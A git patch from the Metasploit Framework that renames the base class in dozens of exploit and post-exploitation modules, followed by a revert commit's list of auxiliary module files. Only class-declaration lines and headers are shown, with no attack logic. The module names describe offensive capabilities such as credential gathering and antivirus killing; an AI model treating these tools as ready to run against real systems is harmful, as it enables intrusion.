b/modules/exploits/multi/ftp/pureftpd_bash_env_exec.rb index a4158ca24b..171b689dbb 100644 --- a/modules/exploits/multi/ftp/pureftpd_bash_env_exec.rb +++ b/modules/exploits/multi/ftp/pureftpd_bash_env_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit4 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/multi/http/apache_mod_cgi_bash_env_exec.rb b/modules/exploits/multi/http/apache_mod_cgi_bash_env_exec.rb index 18a73030c9..d5bd15e7ba 100644 --- a/modules/exploits/multi/http/apache_mod_cgi_bash_env_exec.rb +++ b/modules/exploits/multi/http/apache_mod_cgi_bash_env_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit4 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/caidao_php_backdoor_exec.rb b/modules/exploits/multi/http/caidao_php_backdoor_exec.rb index 9f1aa0fc3a..b3b854cee9 100644 --- a/modules/exploits/multi/http/caidao_php_backdoor_exec.rb +++ b/modules/exploits/multi/http/caidao_php_backdoor_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit4 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/cups_bash_env_exec.rb b/modules/exploits/multi/http/cups_bash_env_exec.rb index 6650ac6209..81897bc3e0 100644 --- a/modules/exploits/multi/http/cups_bash_env_exec.rb +++ b/modules/exploits/multi/http/cups_bash_env_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit4 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/gestioip_exec.rb b/modules/exploits/multi/http/gestioip_exec.rb index ae96ae19be..7b7162bb13 100644 --- a/modules/exploits/multi/http/gestioip_exec.rb +++ b/modules/exploits/multi/http/gestioip_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit4 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/git_client_command_exec.rb b/modules/exploits/multi/http/git_client_command_exec.rb index 4a04f65b09..566cfea515 100644 --- a/modules/exploits/multi/http/git_client_command_exec.rb +++ b/modules/exploits/multi/http/git_client_command_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit4 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer diff --git a/modules/exploits/multi/http/ispconfig_php_exec.rb b/modules/exploits/multi/http/ispconfig_php_exec.rb index c2ce85f329..361c2c90ad 100644 --- a/modules/exploits/multi/http/ispconfig_php_exec.rb +++ b/modules/exploits/multi/http/ispconfig_php_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit4 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/jboss_invoke_deploy.rb b/modules/exploits/multi/http/jboss_invoke_deploy.rb index a9091354fe..4b68cfdd07 100644 --- a/modules/exploits/multi/http/jboss_invoke_deploy.rb +++ b/modules/exploits/multi/http/jboss_invoke_deploy.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit4 < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /JBoss/ ] } diff --git a/modules/exploits/multi/http/moodle_cmd_exec.rb b/modules/exploits/multi/http/moodle_cmd_exec.rb index c742febcc4..fa019366ef 100644 --- a/modules/exploits/multi/http/moodle_cmd_exec.rb +++ b/modules/exploits/multi/http/moodle_cmd_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit < Msf::Exploit::Remote +class Metasploit4 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/multi/http/movabletype_upgrade_exec.rb b/modules/exploits/multi/http/movabletype_upgrade_exec.rb index b6307952d0..5053599cb9 100644 --- a/modules/exploits/multi/http/movabletype_upgrade_exec.rb +++ b/modules/exploits/multi/http/movabletype_upgrade_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit4 < Msf::Exploit::Remote include Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/nas4free_php_exec.rb b/modules/exploits/multi/http/nas4free_php_exec.rb index 1d8d93c8ab..2de2f53e56 100644 --- a/modules/exploits/multi/http/nas4free_php_exec.rb +++ b/modules/exploits/multi/http/nas4free_php_exec.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'rexml/document' -class Metasploit < Msf::Exploit::Remote +class Metasploit4 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/phpmoadmin_exec.rb b/modules/exploits/multi/http/phpmoadmin_exec.rb index fa94de18e6..7c6bcd0db1 100644 --- a/modules/exploits/multi/http/phpmoadmin_exec.rb +++ b/modules/exploits/multi/http/phpmoadmin_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit4 < Msf::Exploit::Remote Rank = ExcellentRanking diff --git a/modules/exploits/multi/http/uptime_file_upload_2.rb b/modules/exploits/multi/http/uptime_file_upload_2.rb index a3d5738d2e..71fe60d2a0 100644 --- a/modules/exploits/multi/http/uptime_file_upload_2.rb +++ b/modules/exploits/multi/http/uptime_file_upload_2.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'nokogiri' -class Metasploit < Msf::Exploit::Remote +class Metasploit4 < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient include Msf::Exploit::PhpEXE diff --git a/modules/exploits/multi/http/werkzeug_debug_rce.rb b/modules/exploits/multi/http/werkzeug_debug_rce.rb index b4d16d3358..4ec74e7e02 100644 --- a/modules/exploits/multi/http/werkzeug_debug_rce.rb +++ b/modules/exploits/multi/http/werkzeug_debug_rce.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Exploit::Remote +class Metasploit4 < Msf::Exploit::Remote Rank = ExcellentRanking diff --git a/modules/exploits/multi/http/zabbix_script_exec.rb b/modules/exploits/multi/http/zabbix_script_exec.rb index b2c6d22124..de4afd7a6a 100644 --- a/modules/exploits/multi/http/zabbix_script_exec.rb +++ b/modules/exploits/multi/http/zabbix_script_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit4 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/misc/xdh_x_exec.rb b/modules/exploits/multi/misc/xdh_x_exec.rb index d30e8e4a78..8e3c0fda70 100644 --- a/modules/exploits/multi/misc/xdh_x_exec.rb +++ b/modules/exploits/multi/misc/xdh_x_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit4 < Msf::Exploit::Remote Rank = ExcellentRanking diff --git a/modules/exploits/multi/sap/sap_mgmt_con_osexec_payload.rb b/modules/exploits/multi/sap/sap_mgmt_con_osexec_payload.rb index 6f3801be9b..da27883df6 100644 --- a/modules/exploits/multi/sap/sap_mgmt_con_osexec_payload.rb +++ b/modules/exploits/multi/sap/sap_mgmt_con_osexec_payload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit4 < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /gSOAP\/2.7/ ] } diff --git a/modules/exploits/multi/sap/sap_soap_rfc_sxpg_call_system_exec.rb b/modules/exploits/multi/sap/sap_soap_rfc_sxpg_call_system_exec.rb index 527d733bfe..5f19e6518f 100644 --- a/modules/exploits/multi/sap/sap_soap_rfc_sxpg_call_system_exec.rb +++ b/modules/exploits/multi/sap/sap_soap_rfc_sxpg_call_system_exec.rb @@ -22,7 +22,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit4 < Msf::Exploit::Remote Rank = GreatRanking diff --git a/modules/exploits/multi/sap/sap_soap_rfc_sxpg_command_exec.rb b/modules/exploits/multi/sap/sap_soap_rfc_sxpg_command_exec.rb index c46aa4fb43..3317ebcd9a 100644 --- a/modules/exploits/multi/sap/sap_soap_rfc_sxpg_command_exec.rb +++ b/modules/exploits/multi/sap/sap_soap_rfc_sxpg_command_exec.rb @@ -22,7 +22,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit4 < Msf::Exploit::Remote Rank = GreatRanking diff --git a/modules/exploits/osx/local/dyld_print_to_file_root.rb b/modules/exploits/osx/local/dyld_print_to_file_root.rb index 258135756d..28008e88b5 100644 --- a/modules/exploits/osx/local/dyld_print_to_file_root.rb +++ b/modules/exploits/osx/local/dyld_print_to_file_root.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Local +class Metasploit4 < Msf::Exploit::Local Rank = GreatRanking diff --git a/modules/exploits/osx/local/rootpipe.rb b/modules/exploits/osx/local/rootpipe.rb index 4c43d1f6c2..f22d6cb6a2 100644 --- a/modules/exploits/osx/local/rootpipe.rb +++ b/modules/exploits/osx/local/rootpipe.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Local +class Metasploit4 < Msf::Exploit::Local Rank = GreatRanking diff --git a/modules/exploits/osx/local/rootpipe_entitlements.rb b/modules/exploits/osx/local/rootpipe_entitlements.rb index 3ab2ce2806..0a031f7a11 100644 --- a/modules/exploits/osx/local/rootpipe_entitlements.rb +++ b/modules/exploits/osx/local/rootpipe_entitlements.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Local +class Metasploit4 < Msf::Exploit::Local Rank = GreatRanking diff --git a/modules/exploits/osx/local/rsh_libmalloc.rb b/modules/exploits/osx/local/rsh_libmalloc.rb index bb8372eff5..97f9ae28dc 100644 --- a/modules/exploits/osx/local/rsh_libmalloc.rb +++ b/modules/exploits/osx/local/rsh_libmalloc.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Local +class Metasploit4 < Msf::Exploit::Local Rank = NormalRanking diff --git a/modules/exploits/osx/local/setuid_tunnelblick.rb b/modules/exploits/osx/local/setuid_tunnelblick.rb index a958dfdd03..c77d4a4a2a 100644 --- a/modules/exploits/osx/local/setuid_tunnelblick.rb +++ b/modules/exploits/osx/local/setuid_tunnelblick.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/exploit/exe' -class Metasploit < Msf::Exploit::Local +class Metasploit4 < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::EXE diff --git a/modules/exploits/osx/local/setuid_viscosity.rb b/modules/exploits/osx/local/setuid_viscosity.rb index 8667bd9381..019a6bb019 100644 --- a/modules/exploits/osx/local/setuid_viscosity.rb +++ b/modules/exploits/osx/local/setuid_viscosity.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/exploit/exe' -class Metasploit < Msf::Exploit::Local +class Metasploit4 < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::EXE diff --git a/modules/exploits/osx/local/tpwn.rb b/modules/exploits/osx/local/tpwn.rb index 528e705579..bfd0864d61 100644 --- a/modules/exploits/osx/local/tpwn.rb +++ b/modules/exploits/osx/local/tpwn.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Local +class Metasploit4 < Msf::Exploit::Local Rank = NormalRanking diff --git a/modules/exploits/unix/local/chkrootkit.rb b/modules/exploits/unix/local/chkrootkit.rb index 2afec2edf9..1c7b5c64a6 100644 --- a/modules/exploits/unix/local/chkrootkit.rb +++ b/modules/exploits/unix/local/chkrootkit.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit < Msf::Exploit::Local +class Metasploit4 < Msf::Exploit::Local # This could also be Excellent, but since it requires # up to one day to pop a shell, let's set it to Manual instead. diff --git a/modules/exploits/unix/local/setuid_nmap.rb b/modules/exploits/unix/local/setuid_nmap.rb index a52a88bc95..db1aeb5ba1 100644 --- a/modules/exploits/unix/local/setuid_nmap.rb +++ b/modules/exploits/unix/local/setuid_nmap.rb @@ -8,7 +8,7 @@ require 'rex' require 'msf/core/exploit/exe' -class Metasploit < Msf::Exploit::Local +class Metasploit4 < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::EXE diff --git a/modules/exploits/windows/browser/apple_quicktime_rdrf.rb b/modules/exploits/windows/browser/apple_quicktime_rdrf.rb index 28695f6595..fd94da6b32 100644 --- a/modules/exploits/windows/browser/apple_quicktime_rdrf.rb +++ b/modules/exploits/windows/browser/apple_quicktime_rdrf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit4 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb b/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb index a63c713036..99cd39a738 100644 --- a/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb +++ b/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/exploit/powershell' -class Metasploit < Msf::Exploit::Remote +class Metasploit4 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/fileformat/apple_quicktime_rdrf.rb b/modules/exploits/windows/fileformat/apple_quicktime_rdrf.rb index be80505173..3cb025d7c9 100644 --- a/modules/exploits/windows/fileformat/apple_quicktime_rdrf.rb +++ b/modules/exploits/windows/fileformat/apple_quicktime_rdrf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit4 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/beetel_netconfig_ini_bof.rb b/modules/exploits/windows/fileformat/beetel_netconfig_ini_bof.rb index f659c63ac1..16f16399e7 100644 --- a/modules/exploits/windows/fileformat/beetel_netconfig_ini_bof.rb +++ b/modules/exploits/windows/fileformat/beetel_netconfig_ini_bof.rb @@ -5,7 +5,7 @@ require "msf/core" -class Metasploit < Msf::Exploit +class Metasploit4 < Msf::Exploit Rank = NormalRanking diff --git a/modules/exploits/windows/ftp/bison_ftp_bof.rb b/modules/exploits/windows/ftp/bison_ftp_bof.rb index 506286ac61..4e71775798 100644 --- a/modules/exploits/windows/ftp/bison_ftp_bof.rb +++ b/modules/exploits/windows/ftp/bison_ftp_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit4 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/freefloatftp_user.rb b/modules/exploits/windows/ftp/freefloatftp_user.rb index 2866a40b22..3352b4407e 100644 --- a/modules/exploits/windows/ftp/freefloatftp_user.rb +++ b/modules/exploits/windows/ftp/freefloatftp_user.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit4 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/sami_ftpd_list.rb b/modules/exploits/windows/ftp/sami_ftpd_list.rb index a8c96eb516..c07761fbd2 100644 --- a/modules/exploits/windows/ftp/sami_ftpd_list.rb +++ b/modules/exploits/windows/ftp/sami_ftpd_list.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit4 < Msf::Exploit::Remote Rank = LowRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/http/netgear_nms_rce.rb b/modules/exploits/windows/http/netgear_nms_rce.rb index bdf2ea5e9e..9e400e9596 100644 --- a/modules/exploits/windows/http/netgear_nms_rce.rb +++ b/modules/exploits/windows/http/netgear_nms_rce.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit4 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/sepm_auth_bypass_rce.rb b/modules/exploits/windows/http/sepm_auth_bypass_rce.rb index bf567a8d8c..bf935718d0 100644 --- a/modules/exploits/windows/http/sepm_auth_bypass_rce.rb +++ b/modules/exploits/windows/http/sepm_auth_bypass_rce.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit4 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FileDropper diff --git a/modules/exploits/windows/local/applocker_bypass.rb b/modules/exploits/windows/local/applocker_bypass.rb index 149446bb26..c48aa4d1ad 100644 --- a/modules/exploits/windows/local/applocker_bypass.rb +++ b/modules/exploits/windows/local/applocker_bypass.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit < Msf::Exploit::Local +class Metasploit4 < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::FileDropper diff --git a/modules/exploits/windows/local/persistence.rb b/modules/exploits/windows/local/persistence.rb index cbeb5a5d09..d719b37e3a 100644 --- a/modules/exploits/windows/local/persistence.rb +++ b/modules/exploits/windows/local/persistence.rb @@ -11,7 +11,7 @@ require 'msf/core/post/windows/priv' require 'msf/core/post/windows/registry' require 'msf/core/exploit/exe' -class Metasploit < Msf::Exploit::Local +class Metasploit4 < Msf::Exploit::Local Rank = ExcellentRanking diff --git a/modules/exploits/windows/local/registry_persistence.rb b/modules/exploits/windows/local/registry_persistence.rb index f04e34fc12..6efe4a89dc 100644 --- a/modules/exploits/windows/local/registry_persistence.rb +++ b/modules/exploits/windows/local/registry_persistence.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/exploit/powershell' require 'msf/core/post/file' -class Metasploit < Msf::Exploit::Local +class Metasploit4 < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::Powershell diff --git a/modules/post/android/capture/screen.rb b/modules/post/android/capture/screen.rb index 0ede39d6b3..678d228d01 100644 --- a/modules/post/android/capture/screen.rb +++ b/modules/post/android/capture/screen.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Post +class Metasploit4 < Msf::Post include Msf::Post::File diff --git a/modules/post/android/manage/remove_lock.rb b/modules/post/android/manage/remove_lock.rb index ad26525593..2c21b86270 100644 --- a/modules/post/android/manage/remove_lock.rb +++ b/modules/post/android/manage/remove_lock.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Post +class Metasploit4 < Msf::Post Rank = NormalRanking include Msf::Post::Common diff --git a/modules/post/android/manage/remove_lock_root.rb b/modules/post/android/manage/remove_lock_root.rb index 289e42c141..1a71658619 100644 --- a/modules/post/android/manage/remove_lock_root.rb +++ b/modules/post/android/manage/remove_lock_root.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Post +class Metasploit4 < Msf::Post include Msf::Post::Common include Msf::Post::Android::Priv diff --git a/modules/post/linux/gather/openvpn_credentials.rb b/modules/post/linux/gather/openvpn_credentials.rb index 189f2559df..2ca64520ce 100644 --- a/modules/post/linux/gather/openvpn_credentials.rb +++ b/modules/post/linux/gather/openvpn_credentials.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Post +class Metasploit4 < Msf::Post include Msf::Post::File include Msf::Post::Linux::Priv diff --git a/modules/post/multi/gather/rubygems_api_key.rb b/modules/post/multi/gather/rubygems_api_key.rb index 38b51fd7fe..bd732bdbe5 100644 --- a/modules/post/multi/gather/rubygems_api_key.rb +++ b/modules/post/multi/gather/rubygems_api_key.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Post +class Metasploit4 < Msf::Post include Msf::Post::File include Msf::Post::Unix diff --git a/modules/post/windows/gather/ntds_location.rb b/modules/post/windows/gather/ntds_location.rb index 0306858c69..a875df954e 100644 --- a/modules/post/windows/gather/ntds_location.rb +++ b/modules/post/windows/gather/ntds_location.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit < Msf::Post +class Metasploit4 < Msf::Post include Msf::Post::File include Msf::Post::Windows::Registry diff --git a/modules/post/windows/manage/killav.rb b/modules/post/windows/manage/killav.rb index ef180b1279..fb86ce4401 100644 --- a/modules/post/windows/manage/killav.rb +++ b/modules/post/windows/manage/killav.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'set' -class Metasploit < Msf::Post +class Metasploit4 < Msf::Post def initialize(info={}) super(update_info(info, diff --git a/modules/post/windows/manage/sticky_keys.rb b/modules/post/windows/manage/sticky_keys.rb index 2a9c1dd6ca..ce5bdbc771 100644 --- a/modules/post/windows/manage/sticky_keys.rb +++ b/modules/post/windows/manage/sticky_keys.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Post +class Metasploit4 < Msf::Post include Msf::Post::File include Msf::Post::Windows::Registry From f703fa21d6974ba998d0d6cf3295cef25bb782b9 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Mon, 7 Mar 2016 13:19:55 -0600 Subject: [PATCH 510/686] Revert "change Metasploit3 class names" This reverts commit 666ae14259085ff71cf1b5966d65c84cd0996c5d. --- modules/auxiliary/admin/2wire/xslt_password_reset.rb | 2 +- .../admin/android/google_play_store_uxss_xframe_rce.rb | 2 +- modules/auxiliary/admin/atg/atg_client.rb | 2 +- modules/auxiliary/admin/backupexec/dump.rb | 2 +- modules/auxiliary/admin/backupexec/registry.rb | 2 +- modules/auxiliary/admin/cisco/vpn_3000_ftp_bypass.rb | 2 +- modules/auxiliary/admin/db2/db2rcmd.rb | 2 +- modules/auxiliary/admin/edirectory/edirectory_dhost_cookie.rb | 2 +- modules/auxiliary/admin/edirectory/edirectory_edirutil.rb | 2 +- modules/auxiliary/admin/emc/alphastor_devicemanager_exec.rb | 2 +- modules/auxiliary/admin/emc/alphastor_librarymanager_exec.rb | 2 +- modules/auxiliary/admin/hp/hp_data_protector_cmd.rb | 2 +- modules/auxiliary/admin/hp/hp_imc_som_create_account.rb | 2 +- .../admin/http/arris_motorola_surfboard_backdoor_xss.rb | 2 +- modules/auxiliary/admin/http/axigen_file_access.rb | 2 +- modules/auxiliary/admin/http/contentkeeper_fileaccess.rb | 2 +- modules/auxiliary/admin/http/dlink_dir_300_600_exec_noauth.rb | 2 +- .../auxiliary/admin/http/dlink_dir_645_password_extractor.rb | 2 +- .../auxiliary/admin/http/dlink_dsl320b_password_extractor.rb | 2 +- modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb | 2 +- modules/auxiliary/admin/http/iis_auth_bypass.rb | 2 +- modules/auxiliary/admin/http/intersil_pass_reset.rb | 2 +- modules/auxiliary/admin/http/iomega_storcenterpro_sessionid.rb | 2 +- modules/auxiliary/admin/http/jboss_bshdeployer.rb | 2 +- modules/auxiliary/admin/http/jboss_deploymentfilerepository.rb | 2 +- modules/auxiliary/admin/http/jboss_seam_exec.rb | 2 +- modules/auxiliary/admin/http/kaseya_master_admin.rb | 2 +- modules/auxiliary/admin/http/limesurvey_file_download.rb | 2 +- modules/auxiliary/admin/http/linksys_e1500_e2500_exec.rb | 2 +- .../auxiliary/admin/http/linksys_tmunblock_admin_reset_bof.rb | 2 +- modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb | 2 +- modules/auxiliary/admin/http/manage_engine_dc_create_admin.rb | 2 +- modules/auxiliary/admin/http/manageengine_dir_listing.rb | 2 +- modules/auxiliary/admin/http/manageengine_file_download.rb | 2 +- modules/auxiliary/admin/http/manageengine_pmp_privesc.rb | 2 +- modules/auxiliary/admin/http/mutiny_frontend_read_delete.rb | 2 +- modules/auxiliary/admin/http/netflow_file_download.rb | 2 +- modules/auxiliary/admin/http/netgear_soap_password_extractor.rb | 2 +- modules/auxiliary/admin/http/novell_file_reporter_filedelete.rb | 2 +- modules/auxiliary/admin/http/rails_devise_pass_reset.rb | 2 +- modules/auxiliary/admin/http/scrutinizer_add_user.rb | 2 +- modules/auxiliary/admin/http/sophos_wpa_traversal.rb | 2 +- modules/auxiliary/admin/http/sysaid_admin_acct.rb | 2 +- modules/auxiliary/admin/http/sysaid_file_download.rb | 2 +- modules/auxiliary/admin/http/sysaid_sql_creds.rb | 2 +- modules/auxiliary/admin/http/tomcat_administration.rb | 2 +- modules/auxiliary/admin/http/tomcat_utf8_traversal.rb | 2 +- modules/auxiliary/admin/http/trendmicro_dlp_traversal.rb | 2 +- modules/auxiliary/admin/http/typo3_sa_2009_002.rb | 2 +- modules/auxiliary/admin/http/vbulletin_upgrade_admin.rb | 2 +- modules/auxiliary/admin/http/wp_custom_contact_forms.rb | 2 +- .../auxiliary/admin/http/wp_easycart_privilege_escalation.rb | 2 +- modules/auxiliary/admin/http/wp_wplms_privilege_escalation.rb | 2 +- modules/auxiliary/admin/http/zyxel_admin_password_extractor.rb | 2 +- modules/auxiliary/admin/maxdb/maxdb_cons_exec.rb | 2 +- modules/auxiliary/admin/misc/sercomm_dump_config.rb | 2 +- modules/auxiliary/admin/misc/wol.rb | 2 +- modules/auxiliary/admin/motorola/wr850g_cred.rb | 2 +- modules/auxiliary/admin/ms/ms08_059_his2006.rb | 2 +- modules/auxiliary/admin/mssql/mssql_enum.rb | 2 +- modules/auxiliary/admin/mssql/mssql_enum_domain_accounts.rb | 2 +- .../auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli.rb | 2 +- modules/auxiliary/admin/mssql/mssql_enum_sql_logins.rb | 2 +- modules/auxiliary/admin/mssql/mssql_escalate_dbowner.rb | 2 +- modules/auxiliary/admin/mssql/mssql_escalate_dbowner_sqli.rb | 2 +- modules/auxiliary/admin/mssql/mssql_escalate_execute_as.rb | 2 +- modules/auxiliary/admin/mssql/mssql_escalate_execute_as_sqli.rb | 2 +- modules/auxiliary/admin/mssql/mssql_exec.rb | 2 +- modules/auxiliary/admin/mssql/mssql_findandsampledata.rb | 2 +- modules/auxiliary/admin/mssql/mssql_idf.rb | 2 +- modules/auxiliary/admin/mssql/mssql_ntlm_stealer.rb | 2 +- modules/auxiliary/admin/mssql/mssql_ntlm_stealer_sqli.rb | 2 +- modules/auxiliary/admin/mssql/mssql_sql.rb | 2 +- modules/auxiliary/admin/mssql/mssql_sql_file.rb | 2 +- modules/auxiliary/admin/mysql/mysql_enum.rb | 2 +- modules/auxiliary/admin/mysql/mysql_sql.rb | 2 +- modules/auxiliary/admin/natpmp/natpmp_map.rb | 2 +- modules/auxiliary/admin/officescan/tmlisten_traversal.rb | 2 +- modules/auxiliary/admin/oracle/ora_ntlm_stealer.rb | 2 +- modules/auxiliary/admin/oracle/oracle_login.rb | 2 +- modules/auxiliary/admin/oracle/oracle_sql.rb | 2 +- modules/auxiliary/admin/oracle/oraenum.rb | 2 +- modules/auxiliary/admin/oracle/osb_execqr.rb | 2 +- modules/auxiliary/admin/oracle/osb_execqr2.rb | 2 +- modules/auxiliary/admin/oracle/osb_execqr3.rb | 2 +- modules/auxiliary/admin/oracle/post_exploitation/win32exec.rb | 2 +- modules/auxiliary/admin/oracle/post_exploitation/win32upload.rb | 2 +- modules/auxiliary/admin/oracle/sid_brute.rb | 2 +- modules/auxiliary/admin/oracle/tnscmd.rb | 2 +- modules/auxiliary/admin/pop2/uw_fileretrieval.rb | 2 +- modules/auxiliary/admin/postgres/postgres_readfile.rb | 2 +- modules/auxiliary/admin/postgres/postgres_sql.rb | 2 +- .../auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb | 2 +- .../auxiliary/admin/scada/ge_proficy_substitute_traversal.rb | 2 +- modules/auxiliary/admin/scada/modicon_command.rb | 2 +- modules/auxiliary/admin/scada/modicon_password_recovery.rb | 2 +- modules/auxiliary/admin/scada/modicon_stux_transfer.rb | 2 +- modules/auxiliary/admin/scada/multi_cip_command.rb | 2 +- modules/auxiliary/admin/scada/yokogawa_bkbcopyd_client.rb | 2 +- modules/auxiliary/admin/serverprotect/file.rb | 2 +- modules/auxiliary/admin/smb/check_dir_file.rb | 2 +- modules/auxiliary/admin/smb/delete_file.rb | 2 +- modules/auxiliary/admin/smb/download_file.rb | 2 +- modules/auxiliary/admin/smb/list_directory.rb | 2 +- modules/auxiliary/admin/smb/psexec_command.rb | 2 +- modules/auxiliary/admin/smb/psexec_ntdsgrab.rb | 2 +- modules/auxiliary/admin/smb/samba_symlink_traversal.rb | 2 +- modules/auxiliary/admin/smb/upload_file.rb | 2 +- modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb | 2 +- modules/auxiliary/admin/tftp/tftp_transfer_util.rb | 2 +- modules/auxiliary/admin/tikiwiki/tikidblib.rb | 2 +- modules/auxiliary/admin/upnp/soap_portmapping.rb | 2 +- modules/auxiliary/admin/vmware/poweroff_vm.rb | 2 +- modules/auxiliary/admin/vmware/poweron_vm.rb | 2 +- modules/auxiliary/admin/vmware/tag_vm.rb | 2 +- modules/auxiliary/admin/vmware/terminate_esx_sessions.rb | 2 +- modules/auxiliary/admin/vnc/realvnc_41_bypass.rb | 2 +- 